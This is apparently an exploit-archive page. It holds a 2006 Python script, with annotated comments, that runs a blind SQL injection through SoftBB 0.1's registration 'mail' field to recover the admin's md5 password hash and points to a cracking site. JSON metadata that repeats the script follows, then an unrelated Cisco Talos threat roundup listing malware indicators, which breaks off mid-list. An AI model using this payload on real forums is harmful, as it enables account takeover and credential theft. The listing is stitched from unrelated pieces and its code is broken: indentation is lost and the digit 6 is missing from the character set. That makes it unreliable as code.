ID 1337DAY-ID-313 Type zdt Reporter LOTFREE Modified 2006-03-19T00:00:00
Description
Exploit for unknown platform in category web applications
====================================================
SoftBB 0.1 (mail) Remote Blind SQL Injection Exploit
====================================================
#!/usr/bin/env python
# LOTFREE TEAM 03/2006
#
# Vulnerability info
# Product : SoftBB
# Version : 0.1
#
# The field 'mail' in reg.php is used directly in a SQL query :
# $sql = 'SELECT pseudo,mail FROM '.$prefixtable.'membres WHERE pseudo = "'.add_gpc($pseudoreg).'" OR mail = "'.$mail.'"';
# Root cause: $pseudoreg goes through add_gpc() but $mail is concatenated as-is.
# The application-side fix is to bind both values as query parameters (or at the
# very least escape 'mail' the same way 'pseudo' is) and to validate the field
# as an e-mail address before it reaches the query.
# We can deduce the result of some SQL queries from the error messages returned:
# the registration page answers differently depending on whether the injected
# condition held, which is the true/false oracle of a boolean-based blind
# injection. Returning one uniform error for every failed registration removes
# this particular oracle even before the query itself is fixed.
# The script tests the characters of the md5 hash one by one using a special query.
#
# This is Python 2 code (print statements, httplib) and will not run as-is on
# Python 3. The loop bodies below are not indented in this listing, so the file
# does not even parse as shown; the nesting has to be inferred from the two
# for-loops.
import httplib, urllib
# Change the following values...
admin="admin"
server="localhost"
path="/forum"
#
hash=""   # shadows the builtin hash(); accumulates the recovered md5 hex string
chars=('a','b','c','d','e','f','1','2','3','4','5','7','8','9','0')
print "LOTFREE TEAM SoftBB BruteForcing tool"
print "-------------------------------------"
# One pass per hash position (md5 hex digest = 32 characters); every candidate
# character costs one HTTP POST, so a full run is up to 32 * len(chars) requests
# to the registration page. Defender's view: that burst of POSTs to
# index.php?page=reg from a single client, with a 'mail' value containing SQL
# keywords such as "union select", is what to look for in web-server / WAF logs.
for i in range(1,33):
print "Brute forcing hash["+str(i)+"]"
for a in chars:
params=urllib.urlencode({'pseudo':admin,
'mdp':'1',
'mdpc':'1',
'mail':'" union select pseudo,1 from softbb_membres where pseudo="'+admin+'" and substr(mdp,'+str(i)+',1)="'+a+'" limit 1,1#',
'condok':'true'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(server)
conn.request("POST", path+"/index.php?page=reg", params, headers)
response = conn.getresponse()
data = response.read()
conn.close()
# Oracle check: the script treats the presence of this French message
# (presumably the "pseudonym already in use" error -- verify against reg.php)
# as meaning the injected condition held, i.e. the guessed character matched.
if data.find("Ce pseudonyme est d")>0:
hash=hash+a
continue
print
# A 32-character result means every position was matched by some candidate;
# anything shorter is reported as a failure.
if len(hash)==32:
print "Found hash =",hash,"for account",admin
print "You can use http://md5.rednoize.com/ to crack the md5 hash"
else:
print "Exploit failed... verify the path to the forum or try changing the limit 1,1 in the sql request..."
# 0day.today [2018-04-08] #
{"hash": "5a6d9bc02059e02f6bb425fb98bbf1c2248925220598386f05745995738376b5", "id": "1337DAY-ID-313", "lastseen": "2018-04-08T03:48:39", "viewCount": 13, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "50a47ceef913d434f22954fddd4d17f6", "key": "href"}, {"hash": "b8bec691997f0a30c7526f8318d7cc5f", "key": "modified"}, {"hash": "b8bec691997f0a30c7526f8318d7cc5f", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "972a685222d80b5f31cd7681ea1e0282", "key": "reporter"}, {"hash": "b5c1da0433ca0ba4714fa2eb39ca01ba", "key": "sourceData"}, {"hash": "54f97fa4bd9d57e0ef5c8357f0de5090", "key": "sourceHref"}, {"hash": "620daa74aa74720370a4072e3f94f94c", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2018-04-08T03:48:39"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-31559", "1337DAY-ID-31316", "1337DAY-ID-31303", "1337DAY-ID-30738", "1337DAY-ID-29439", "1337DAY-ID-28956", "1337DAY-ID-28870", "1337DAY-ID-28620"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150240", "PACKETSTORM:149776", "PACKETSTORM:149763", "PACKETSTORM:144882", "PACKETSTORM:144343"]}, {"type": "exploitdb", "idList": ["EDB-ID:45804", "EDB-ID:45590", "EDB-ID:45586", "EDB-ID:43120"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310814003", "OPENVAS:1361412562310107303"]}, {"type": "zeroscience", "idList": ["ZSL-2018-5484"]}], "modified": "2018-04-08T03:48:39"}, "vulnersScore": -0.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/313", "description": "Exploit for unknown platform in category web 
applications", "title": "SoftBB 0.1 (mail) Remote Blind SQL Injection Exploit", "history": [{"bulletin": {"hash": "c2a1959cae489d899df2cf96645878e4eafe9007489fc4766c05a85ebf5c66fc", "id": "1337DAY-ID-313", "lastseen": "2016-04-19T01:43:26", "enchantments": {"score": {"value": 4.3, "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:N/", "modified": "2016-04-19T01:43:26"}}, "hashmap": [{"hash": "b8bec691997f0a30c7526f8318d7cc5f", "key": "published"}, {"hash": "b8bec691997f0a30c7526f8318d7cc5f", "key": "modified"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "3232317cfe2c5ea99deb5c0ad725ae13", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "82d3accbe6ba9f0180bc794abdc73aa7", "key": "sourceData"}, {"hash": "55fb51bdf8c7c4823c9e0414705ae7fd", "key": "href"}, {"hash": "620daa74aa74720370a4072e3f94f94c", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "972a685222d80b5f31cd7681ea1e0282", "key": "reporter"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/313", "description": "Exploit for unknown platform in category web applications", "viewCount": 2, "title": "SoftBB 0.1 (mail) Remote Blind SQL Injection Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "====================================================\r\nSoftBB 0.1 (mail) Remote Blind SQL Injection Exploit\r\n====================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/env python\r\n# LOTFREE TEAM 03/2006\r\n#\r\n# Vulnerability info\r\n# Product : SoftBB\r\n# Version : 0.1\r\n#\r\n# The field 'mail' in reg.php is used directly in a SQL query :\r\n# $sql = 'SELECT pseudo,mail 
FROM '.$prefixtable.'membres WHERE pseudo = \"'.add_gpc($pseudoreg).'\" OR mail = \"'.$mail.'\"';\r\n# We can deduce deduce the result of some sql querys according to the error messages returned\r\n# The exploit test the characters of the md5 hash one by one using a special query\r\nimport httplib, urllib\r\n\r\n# Change the following values...\r\nadmin=\"admin\"\r\nserver=\"localhost\"\r\npath=\"/forum\"\r\n#\r\nhash=\"\"\r\nchars=('a','b','c','d','e','f','1','2','3','4','5','7','8','9','0')\r\n\r\nprint \"LOTFREE TEAM SoftBB BruteForcing tool\"\r\nprint \"-------------------------------------\"\r\nfor i in range(1,33):\r\n print \"Brute forcing hash[\"+str(i)+\"]\"\r\n for a in chars:\r\n params=urllib.urlencode({'pseudo':admin,\r\n 'mdp':'1',\r\n 'mdpc':'1',\r\n 'mail':'\" union select pseudo,1 from softbb_membres where pseudo=\"'+admin+'\" and substr(mdp,'+str(i)+',1)=\"'+a+'\" limit 1,1#',\r\n 'condok':'true'})\r\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\", \"Accept\": \"text/plain\"}\r\n conn = httplib.HTTPConnection(server)\r\n conn.request(\"POST\", path+\"/index.php?page=reg\", params, headers)\r\n response = conn.getresponse()\r\n data = response.read()\r\n conn.close()\r\n if data.find(\"Ce pseudonyme est d\")>0:\r\n hash=hash+a\r\n continue\r\n\r\nprint\r\nif len(hash)==32:\r\n print \"Found hash =\",hash,\"for account\",admin\r\n print \"You can use http://md5.rednoize.com/ to crack the md5 hash\"\r\nelse:\r\n print \"Exploit failed... 
verify the path to the forum or try changing the limit 1,1 in the sql request...\" \r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2006-03-19T00:00:00", "references": [], "reporter": "LOTFREE", "modified": "2006-03-19T00:00:00", "href": "http://0day.today/exploit/description/313"}, "lastseen": "2016-04-19T01:43:26", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "====================================================\r\nSoftBB 0.1 (mail) Remote Blind SQL Injection Exploit\r\n====================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/env python\r\n# LOTFREE TEAM 03/2006\r\n#\r\n# Vulnerability info\r\n# Product : SoftBB\r\n# Version : 0.1\r\n#\r\n# The field 'mail' in reg.php is used directly in a SQL query :\r\n# $sql = 'SELECT pseudo,mail FROM '.$prefixtable.'membres WHERE pseudo = \"'.add_gpc($pseudoreg).'\" OR mail = \"'.$mail.'\"';\r\n# We can deduce deduce the result of some sql querys according to the error messages returned\r\n# The exploit test the characters of the md5 hash one by one using a special query\r\nimport httplib, urllib\r\n\r\n# Change the following values...\r\nadmin=\"admin\"\r\nserver=\"localhost\"\r\npath=\"/forum\"\r\n#\r\nhash=\"\"\r\nchars=('a','b','c','d','e','f','1','2','3','4','5','7','8','9','0')\r\n\r\nprint \"LOTFREE TEAM SoftBB BruteForcing tool\"\r\nprint \"-------------------------------------\"\r\nfor i in range(1,33):\r\n print \"Brute forcing hash[\"+str(i)+\"]\"\r\n for a in chars:\r\n params=urllib.urlencode({'pseudo':admin,\r\n 'mdp':'1',\r\n 'mdpc':'1',\r\n 'mail':'\" union select pseudo,1 from softbb_membres where pseudo=\"'+admin+'\" and substr(mdp,'+str(i)+',1)=\"'+a+'\" limit 1,1#',\r\n 'condok':'true'})\r\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\", \"Accept\": \"text/plain\"}\r\n conn = httplib.HTTPConnection(server)\r\n conn.request(\"POST\", path+\"/index.php?page=reg\", params, 
headers)\r\n response = conn.getresponse()\r\n data = response.read()\r\n conn.close()\r\n if data.find(\"Ce pseudonyme est d\")>0:\r\n hash=hash+a\r\n continue\r\n\r\nprint\r\nif len(hash)==32:\r\n print \"Found hash =\",hash,\"for account\",admin\r\n print \"You can use http://md5.rednoize.com/ to crack the md5 hash\"\r\nelse:\r\n print \"Exploit failed... verify the path to the forum or try changing the limit 1,1 in the sql request...\" \r\n\r\n\r\n\n# 0day.today [2018-04-08] #", "published": "2006-03-19T00:00:00", "references": [], "reporter": "LOTFREE", "modified": "2006-03-19T00:00:00", "href": "https://0day.today/exploit/description/313"}
{"talosblog": [{"lastseen": "2019-11-01T19:01:48", "bulletinFamily": "blog", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 25 and Nov. 1. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5dbc4d7341857.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Malware.Trickbot-7367071-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. 
This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB Scripts. \nWin.Dropper.Emotet-7365661-0 | Dropper | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019. \nWin.Trojan.DarkComet-7365618-1 | Trojan | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system. \nWin.Packed.Zbot-7364099-0 | Packed | Zbot, also known as Zeus, is a trojan that steals information such as banking credentials using methods like key-logging and form-grabbing. \nWin.Malware.njRAT-7363922-1 | Malware | njRAT, also known as Bladabindi, is a RAT that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014. \nWin.Trojan.Socks-7363151-0 | Trojan | Socks is a generic worm that spreads itself via autorun.inf files and downloads follow-on malware to infected systems. \nWin.Malware.Lokibot-7363866-1 | Malware | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails. 
\nWin.Packed.Zeroaccess-7358361-0 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click-fraud campaigns. \nWin.Ransomware.Shade-7357624-1 | Ransomware | Shade, also known as Troldesh, is a ransomware family typically spread via malicious email attachments. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Malware.Trickbot-7367071-1\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 31 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`23[.]94[.]233[.]210` | 15 \n`192[.]3[.]104[.]46` | 11 \n`192[.]3[.]247[.]11` | 3 \n`172[.]82[.]152[.]126` | 2 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\Download http service` | 31 \n`%ProgramData%\\\u00d0\u00bc\u00d1\u2021\u00d0\u00b2\u00d0\u00b0\u00d0\u017e\u00d0\u00bd\u00d0\u00b3\u00d1\u02c6\u00d0\u00ac\u00d0\u203a\u00d0\u2019\u00d1\u2021\u00d1\u008f\u00d0\u00b9.dfxcsd` | 31 \n`%APPDATA%\\NuiGet` | 31 \n`%APPDATA%\\NuiGet\\settings.ini` | 31 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 27 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 27 \n \n#### File Hashes\n\n` 12e8006a018c424bcb76b7c97d880314c08f79d8951a545d92d73034f5778ec7 194f14146ed498074cb229f3941740463913e79bc4a08a765f2ffd490dfbbdd0 35030bca598f6d38bf753df2c51fa0b43a0189f44438728efd0b17027cb7d6f6 4a66279719169895ee353164bebd0d14aea7bd6588fe0d4cea242465b260a519 4e42cd765cf0ab37b5a1141d446607a672473d409a7da92a34a3add36ce1a8c7 4ea19a355329cbf55d60502bc479daae8664a0df0148b52d0096d0ea9df67626 5c49e59a65499989081ae896fd9748ef572315a3c064e63e246a670d1d292fe0 5efb96495538937fe47d41b0d7e98db37de61e6f593d349238286df075c1397c 686831b801833681a66bf8d26369358725d6eeb3d6a59dfba359d0cffc0a6879 6b63955ef70f2db59d37e4a9d1d8ea6160348a07075a63f3aba90344a4359870 6c59d5e1cbc381e8fabd6886b9202ccb8cb47fde6d197ef656ca9038d720562b 
6d64abd7986e0caefe99c4c11f23ee79dc583b5ae8667b44b224cbc2ed5587db 71d6c8a2a0201af5013f6624738ca844095d6f50d7a31f105e60726d54589918 75cc6fafd3becff2a1dcb7e7a4b37542fe5fcd4f399d36ae5d5659336900b4fb 7acd91a84c5bea43ad99688a67760fd0826bc7d67b0de373292f06ecbe2d9297 81cb4e71e4327b1969f30625661c6e027c8e33cfc04be4acd20cbe3a913c236b 823e680c8c8b03a264a6cd347b84ee72913622f0bc675b18a0b3dbe0cb11422a 8d6e5a67290d22e5bb7e2beed6d83c67bb40455c3a2e27e802997aaa7f98760a 9123558e3b1d5f8041754f2bf41ed0f453d3a02da5979454f9f574efc6dc82ef 9373dd5aeea4258abed94cae3f4cf771b59714f6b7f31efb16394108cf3a9e2d 98dd50a96301fae6c07eafed51df1d5d1bd444a7920a076cc2a72bb483ae9542 a5dbee433d7d11dfff76b54e00c1879f969787f9b760908add1f89946381165e b9b992d27c996693b7d315b58a51a562e9c9286728fa162d0204fad15cc68a28 bd49f6d5e49f5dd45a38128ef576a86f1c447842d7a428ae08c7e33e321ed7aa c98366526022af2d7c17edf78d0bc5856aabebdf712f314574c6c9bc65454cd5 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-r0YU7XD9ums/XbxaV0GHyjI/AAAAAAAAC3c/cLthlQKYfA8Pk0XsFPKoEZOlgFEuWOmSwCLcBGAsYHQ/s1600/bd49f6d5e49f5dd45a38128ef576a86f1c447842d7a428ae08c7e33e321ed7aa_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Emotet-7365661-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: Type ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: Start ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: ErrorControl ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: ImagePath ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: DisplayName ` | 168 
\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: WOW64 ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: ObjectName ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: Description ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS ` | 168 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 168 \n`Global\\M98B68E3C` | 168 \n`Global\\<random guid>` | 3 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`167[.]99[.]105[.]223` | 77 \n`54[.]38[.]94[.]197` | 59 \n`176[.]31[.]200[.]130` | 54 \n`74[.]202[.]142[.]71` | 52 \n`173[.]194[.]68[.]108/31` | 48 \n`190[.]182[.]161[.]7` | 48 \n`186[.]159[.]246[.]121` | 43 \n`190[.]229[.]205[.]11` | 41 \n`79[.]143[.]182[.]254` | 41 \n`62[.]149[.]157[.]55` | 35 \n`178[.]128[.]148[.]110` | 34 \n`212[.]129[.]24[.]79` | 34 \n`62[.]149[.]128[.]179` | 33 \n`176[.]9[.]47[.]53` | 31 \n`74[.]202[.]142[.]33` | 31 \n`62[.]149[.]152[.]151` | 31 \n`62[.]149[.]128[.]200/30` | 29 \n`17[.]36[.]205[.]74` | 27 \n`62[.]149[.]128[.]72/30` | 26 \n`191[.]252[.]112[.]194/31` | 25 \n`185[.]94[.]252[.]27` | 24 \n`45[.]55[.]82[.]2` | 24 \n`37[.]187[.]5[.]82` | 24 \n`200[.]206[.]34[.]68` | 24 \n`172[.]217[.]10[.]243` | 23 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`smtp[.]prodigy[.]net[.]mx` | 51 \n`mail[.]aruba[.]it` | 35 \n`smtp[.]infinitummail[.]com` | 33 \n`pop3s[.]aruba[.]it` | 33 \n`imail[.]dahnaylogix[.]com` | 31 \n`smtp[.]alestraune[.]net[.]mx` | 31 \n`mail[.]pec[.]aruba[.]it` | 31 \n`smtp[.]pec[.]aruba[.]it` | 31 \n`mail[.]outlook[.]com` | 27 \n`smtpout[.]secureserver[.]net` | 27 \n`pop3s[.]pec[.]aruba[.]it` | 26 \n`mail[.]cemcol[.]hn` | 19 \n`smtp[.]secureserver[.]net` | 18 \n`smtp[.]orange[.]fr` | 17 \n`ssl0[.]ovh[.]net` | 17 \n`as1r1066[.]servwingu[.]mx` | 15 \n`imaps[.]aruba[.]it` | 15 \n`outlook[.]office365[.]com` | 14 \n`mail[.]tiscali[.]it` | 14 \n`mail[.]singnet[.]com[.]sg` | 13 \n`mail[.]libero[.]it` | 13 \n`mbox[.]cert[.]legalmail[.]it` | 13 \n`mail[.]funfruit[.]com[.]mx` | 13 \n`mail[.]caoa[.]com[.]br` | 13 \n`smtp[.]outlook[.]com` | 12 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\xcsdwrsdk.dtxsd` | 91 \n`%ProgramData%\\dxcsdyjgbn.dfxcsd` | 77 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 56 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 56 \n`%SystemRoot%\\SysWOW64\\chinesesongsa.exe` | 6 \n`%SystemRoot%\\SysWOW64\\chinesesongsb.exe` | 3 \n`%ProgramData%\\Len350p.exe` | 1 \n`%ProgramData%\\uUgG1WJQ4usO.exe` | 1 \n`\\TEMP\\PpoNLODk9uCChTGo9HH.exe` | 1 \n`%SystemRoot%\\TEMP\\543E.tmp` | 1 \n`\\TEMP\\h5xs_232.exe` | 1 \n`\\TEMP\\R53Pew.exe` | 1 \n`\\TEMP\\o86t6prpvay0ah3.exe` | 1 \n`\\TEMP\\hw8ah6hmp5ku.exe` | 1 \n`\\TEMP\\scsl_2153.exe` | 1 \n`\\TEMP\\1p3gf.exe` | 1 \n`\\TEMP\\xk3wdb8t.exe` | 1 \n`\\TEMP\\067vnss8y_680.exe` | 1 \n`\\TEMP\\ypb8jo5.exe` | 1 \n`\\TEMP\\41v2241jicyu8m8.exe` | 1 \n`\\TEMP\\8aklv68ynf.exe` | 1 \n`%SystemRoot%\\TEMP\\2086.tmp` | 1 \n`%SystemRoot%\\TEMP\\2096.tmp` | 1 \n`\\TEMP\\wealxtx4234pz0.exe` | 1 \n`\\TEMP\\RlwZ7vqPWQOoRg.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 
0299861a3cdc50a555b8d327b8cdbe9ebb3d286bd67d34fd78e82910ba0a69da 02e0225c00b4f47728a493dbad00964ff4e2f975312d2fdccb5fee836b8e02a7 04242859c480e5af73f938324355a7058c209a29bd90cdc9c03095da158aafb6 04edae27709686fe0eec70970a0bb0073e1e573ed64341705545068b789eda9b 068c2726caca44b77e7ee220fb4d181d086dbf433c76b588297477ac5689d572 0704a26d82961ffcc14aa5f1ca3df6be3cd09cd4a27580ecff7eea8f6b70f7e2 078d578cfbb4ea91813381500b1d4b56106bb4c73b30697b6f9cc6bc46727251 0b1bb755d31acfd314aa59b362818f89afee12840cffa7665b9a21c909249e73 0c15940c4c9a49103c2e0b33cb1488a8838aa905dddc2a53e841e5be07a1cfe3 0df437e357d886397345b7bcebd48a4404c6c923758ea30bd286fbf786531771 100ed9e984af228f4c63f6e389066f244a146a07a24a98b2ef5737484f8b9418 10cb59a28331f74a3eb14a688be158aa83ad848a29b42e9b5e69f210470004af 10dd8ab62c73328905f71435a19e2fbd4c0b3c0bfb9c62e499ce321cd455e03d 11b968a43e6f27e16c73887a56b9e04315caa0ea36ccce003411ebeb83bfb28c 11cec37f15cb1f81608912172d843502b3e74c3cf5a6002b1d186b08c561556f 12e8a80c47ac89a43c220db77cd56b746284d8fb08b0544d0b5642ff01d42c31 186d8fc5e47032b99b15b3e64d5df4427d2d89dd8a0fc08e720800f5715f1f69 19dec17408be3e2a980e50f038d4563911a0a3b315085db29b1cce06415902ce 1a24c713e52fc6072e7586ecd2ab3e858b03c893e463aae8c678c05c3b493be7 1ada1f15d5e4b2a7b67a8ee63ddb8ffbd15c2a2299977f3ff0f26f557e3d1ed8 1c80dd78b374786cd12cb3c466a69faef4b336b31b88259f735ae90a590151d6 217b0f8c66870cd11d7e6d22125e4afbb2ae711154a5ea7f56c40a02e7d6edfa 229b1494c66f15a919697f70307f34e082b77e53b4ec35b0425e5a1cac4665a2 23699f526439964cce4a8e8c9c5f27a4549bd7bb0293cae683e84730e20887ca 24d0044976a4122a3fcfedad6f66849eb0d1d9fa7fb7f7ad52bf0a9d97f394b5 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### 
AMP\n\n[](<https://1.bp.blogspot.com/-o2TmvVaFldY/XbxcOZ7C8jI/AAAAAAAAC3o/wBR9xuN1kEgLxbuiY9qtUwgF8jcSIOSKgCLcBGAsYHQ/s1600/186d8fc5e47032b99b15b3e64d5df4427d2d89dd8a0fc08e720800f5715f1f69_amp.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-DYIS3fPk8sU/XbxcUlEAj-I/AAAAAAAAC3s/6HXf9kmfiXknSOCXVA3SxeaYjBj-CKDFQCLcBGAsYHQ/s1600/9b2a21c2d7563157b968e798f7a289c4010230532569a61638c6dabe9585b7db_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.DarkComet-7365618-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\DC3_FEXEC ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: java ` | 25 \nMutexes | Occurrences \n---|--- \n`DC_MUTEX-6ZFK11A` | 25 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`mrsnickers03[.]no-ip[.]biz` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\dclogs` | 25 \n`%APPDATA%\\IDM` | 25 \n`%APPDATA%\\IDM\\ichader.exe` | 25 \n`%TEMP%\\WTHTE.bat` | 2 \n`%TEMP%\\WTHTE.txt` | 2 \n`%TEMP%\\SXIJG.txt` | 1 \n`%TEMP%\\PTQEQ.bat` | 1 \n`%TEMP%\\PTQEQ.txt` | 1 \n`%TEMP%\\USQVI.bat` | 1 \n`%TEMP%\\USQVI.txt` | 1 \n`%TEMP%\\CQGTP.bat` | 1 \n`%TEMP%\\CQGTP.txt` | 1 \n`%TEMP%\\NKKWS.bat` | 1 \n`%TEMP%\\NKKWS.txt` | 1 \n`%TEMP%\\WAXFT.bat` | 1 \n`%TEMP%\\WAXFT.txt` | 1 \n`%TEMP%\\JRFQG.bat` | 1 \n`%TEMP%\\JRFQG.txt` | 1 \n`%TEMP%\\APQNW.bat` | 1 \n`%TEMP%\\APQNW.txt` | 1 \n`%TEMP%\\UVJWH.bat` | 1 \n`%TEMP%\\UVJWH.txt` | 1 \n`%TEMP%\\OSNVJ.bat` | 1 \n`%TEMP%\\OSNVJ.txt` | 1 \n`%TEMP%\\MUISJ.bat` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0d35dc067583af9f8ec8aa97a0ffafc8a92c52145196755eff63f62fd545da80 4671622ecb23629041c6f808461e60b20692ba4920d7207442db3e0bb2f9cb43 560532abb05b4b9219c6206d02defb4ce74f0f07be27173257df016e2576e0c1 5b6a3069e1fdad0d43dea5e289a41ea3a76c2583990f070368394154339dc682 60fda48fabb1047741a46cb1989b1ed5a49fa8214955e328d9b9e0825bd06dae 
